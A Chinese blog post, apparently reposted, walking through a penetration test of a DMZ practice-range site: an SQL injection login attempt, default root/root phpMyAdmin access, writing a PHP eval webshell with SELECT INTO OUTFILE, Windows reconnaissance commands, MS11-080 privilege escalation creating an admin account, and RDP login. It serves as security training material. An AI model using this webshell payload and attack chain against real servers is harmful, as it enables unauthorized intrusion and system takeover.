DMZ靶场渗透

0x00 目标站点www.test.ichunqiu

 

0x01 尝试登陆系统

-尝试弱密码登陆
结果:forbidden!!!

-尝试万能账号密码登陆

1‘ or 1=1--+ 和 1‘ or 1=1--+

结果:forbidden!!!

从登陆入口得不到其他更多的有效信息,所以从其他地方找突破口

0x02 使用御剑后台扫描工具对站点进行扫面

-开始扫描

 

-扫描得到一条目录信息:http://www.test.ichunqiu/phpmyadmin/

 

-打开扫描出来的链接,发现是phpmyadmin数据库管理程序

 

0x03 新的突破口:phpmyadmin

-得到phpmyadmin的登陆入口,当然就是想办法登陆进phpmyadmin系统
-尝试使用默认账号密码root/root进行登陆

 

-成功登陆进系统
-既然登陆进了phpmyadmin数据库的web管理页面,那也就相当于可以任意的查看整个数据库的内容,所以,尝试在数据库中去找到刚才想要登陆的系统的账号密码
-结果发现:当前web应用程序使用的数据库是个空数据库

 

0x04 利用sql语句写入webshell

-既然从数据库里面找不到登陆进后台管理页面的账号密码,所以只能从phpmyadmin提供的功能入手
-执行sql语句:select @@basedir  查询当前数据库所在的目录
-得到目录在:c:/phpstudy/mysql

 

-根据得到的数据库所在路径可以猜测,整个网站所在的根目录的路径是:C:/phpstudy/www
-既然猜测到了网站的根目录,那么尝试利用sql语句往网站根目录下写入一句话的webshell
-构造的sql语句: select “<?php eval($_POST[‘pass’])?>” into outfile “c:\\phpstudy\\www\\shell.php”

 

-成功写入webshell

0x05 使用菜刀连接webshell

 

-成功连接上:getshell

 

0x06 提权之前的信息收集

--获取主机名:
-hosname
--获取所属域信息:
-systeminfo
 
--获取系统补丁情况
-wmic qfe list   获取失败,没有权限,但是通过前面的system也能大致了解系统补丁安装情况
 
--获取本地用户组:
-net localgroup

--获取本地用户
-net user
 
--获取本地管理员信息:
-net localgroup administrators

0x07 利用exp:ms11080 获取系统管理员权限

根据前面对系统信息的收集和判断,在当前系统利用ms11080.exe来提升系统权限,使我们获得一个管理员权限的账户
-将ms11080上传至服务器的一个可读写的目录
 

-执行ms11080.exe(这个exp是一个不支持自定义命令参数的)
-成功执行exp,创建了一个具有administrator权限的90sec的管理员账户

 

0x08 利用新建的管理员账户90sec通过3389端口远程登陆进目标系统

-打开mstsc程序
 
-连接目标主机
 
-登陆目标主机
-成功通过远程桌面连接目标系统

 

转载于:https://www.cnblogs.com/ldhbetter/p/9200885.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值